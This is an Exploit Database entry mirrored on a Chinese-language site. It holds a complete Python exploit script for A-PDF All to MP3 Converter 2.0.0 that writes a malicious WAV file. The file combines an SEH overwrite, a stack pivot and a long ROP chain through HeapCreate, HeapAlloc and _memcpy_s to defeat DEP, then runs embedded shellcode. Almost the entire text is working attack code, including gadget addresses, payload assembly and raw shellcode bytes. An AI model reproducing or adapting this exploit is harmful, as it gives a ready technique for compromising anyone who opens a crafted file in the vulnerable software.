A-PDF All to MP3 Converter 2.0.0 – DEP Bypass via HeapCreate + HeapAlloc

• Exploit Database
• 130 阅读

• 作者： George Washington
  日期： 2024-03-03
• 类别：

  • local
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51849/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226

  #!/usr/bin/python # Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain # Date: 16 November 2023 # Exploit Author: George Washington # Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm # Software Link: http://www.a-pdf.com/all-to-mp3/download.htm # Version: 2.0.0 # Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64 # Based on: https://www.exploit-db.com/exploits/17275 # Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe # Video: https://youtu.be/_JEgdKjbtpI   import socket, struct   file = "1.wav" size = 8000   ############ Parameters for HeapCreate() ############ EXE = b"ZZZZ"# HeapCreate() EXE += b"AAAA" # RET EXE += struct.pack("<I", 0x00040000) # Parameter 1 0x00040000 EXE += struct.pack("<I", 0x00000000) # Parameter 2 0x00000000 EXE += struct.pack("<I", 0x00000000) # Parameter 3 0x00000000 EXE += b"YYYY" # HeapAlloc() EXE += b"BBBB" # RET EXE += b"CCCC" # Parameter 1 hHandle EXE += struct.pack("<I", 0x00000008) # Parameter 2 0x00000008 EXE += struct.pack("<I", 0x00000500) # Parameter 3 0x00000500 EXE += struct.pack("<I", 0x1002dd98) # _memcpy_s() EXE += b"DDDD" # heap pointer EXE += b"EEEE" # heap pointer EXE += struct.pack("<I", 0x00000500) # size EXE += b"GGGG" # shellcode pointer EXE += struct.pack("<I", 0x00000500) # size   junk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh"   #######################STACK PIVOT########################### SEH = struct.pack("<I", 0x005CE870) # 0x005CE870add esp 0x800, 4 pops, ret [alltomp3.exe]   #######################1. Get Stack Pointer to point to ZZZZ########################### ROP = struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret;(1 found) ROP += struct.pack("<I", 0xffffff1c) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;(1 found) ROP += b"A" * 4 # ecx points to ZZZZ   #######################2. Get and set ZZZZ to HeapCreate########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret;(1 found) [Module : lame_enc.dll] ROP += b"A" * 0x10 ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IAT ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret;(1 found) [Module : lame_enc.dll] ROP += struct.pack("<I", 0x41414141) # eax has HeapCreate ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret;(1 found) [Module : lame_enc.dll]   #######################3. Set RET ########################### ROP += struct.pack("<I", 0x1003c452)# 0x1003c452: pop eax ; ret;(1 found) ROP += struct.pack("<I", 0x1001939e)# 0x1001939e: add esp, 0x000001A0 ; ret;(1 found) ROP += struct.pack("<I", 0x1003303A)# 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]**   #######################4. Go to HeapCreate########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret;(1 found) ROP += struct.pack("<I", 0xfffffea4) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret;(1 found) ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret;(1 found) // pad it # when heap create finishes, eax will have hHeap ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found)   #######################5. Get Stack Pointer to point to YYYY########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret;(1 found) ROP += struct.pack("<I", 0xfffffe58) ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*3 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;(1 found) ROP += b"A" * 4 # ecx points to YYYY   #######################6. Get and set YYYY to HeapAlloc########################### ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret;(1 found) [Module : lame_enc.dll] ROP += b"A" * 0x10 ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IAT ROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret;(1 found) [Module : lame_enc.dll] ROP += struct.pack("<I", 0x41414141) # eax has HeapCreate ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret;(1 found) [Module : lame_enc.dll]   #######################7. Set RET ########################### ROP += struct.pack("<I", 0x1003c452)# 0x1003c452: pop eax ; ret;(1 found) ROP += struct.pack("<I", 0x10014d32)# 0x10014d32: add esp, 0x00000280 ; ret;(1 found) ROP += struct.pack("<I", 0x1003303A)# 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret;(1 found) [Module : lame_enc.dll]   #######################8. Set hHEAP ########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found) <- should return here and start executing here ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]**   #######################9. Go to HeapAlloc########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret;(1 found) ROP += struct.pack("<I", 0xfffffdcc) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret;(1 found) # when heap create finishes, eax will have hHeap ROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret;(1 found) // pad it ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found)   #######################10. Get Stack Pointer to point to DDDD ########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret;(1 found) ROP += struct.pack("<I", 0xfffffd5c) ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*3 ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;(1 found) ROP += b"A" * 4 # ecx points to DDDD   #######################12. Set RET########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found) ROP += b"A"*0x10 ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found) ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret;(1 found) [Module : lame_enc.dll]   #######################13. DESTIN########################### ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found) ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found) ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret;(1 found) [Module : lame_enc.dll]*   #######################14. SOURCE########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret;(1 found) ROP += struct.pack("<I", 0x000000a0) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x1003303A) # 0x1003303A# MOV DWORD PTR DS:[ECX],EAX # RETN [Module : lame_enc.dll]** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret;(1 found)   #######################15. GOTO _memcpy_s########################### ROP += struct.pack("<I", 0x0042C7CB)# 0x0042C7CB# PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]** Null byte ** ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D# MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]** ROP += b"A" * 4 ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret;(1 found) ROP += struct.pack("<I", 0xfffffc94) ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret;(1 found) ROP += struct.pack("<I", 0x41414141)*4 ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret;(1 found)   #######################SHELLCODE########################### shellcode = b"\xcc" * 400 real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"   #######################CONSTRUCT########################### SIZE = 500 start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode)) start_of_padding += shellcode start_of_padding += EXE   SIZE = 1500 RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET #INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3; pop esi ; ret;(1 found) INT = struct.pack("I", 0x1003c6aa)*2   rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172 rest_of_payload += b"\x90" * 100 rest_of_payload += real_shellcode rest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))   payload = junk + SEH + start_of_padding + rest_of_payload   REST = b"\x44" * (size-len(payload)) payload += REST   file = open("1.wav", "wb") file.write(payload) file.close()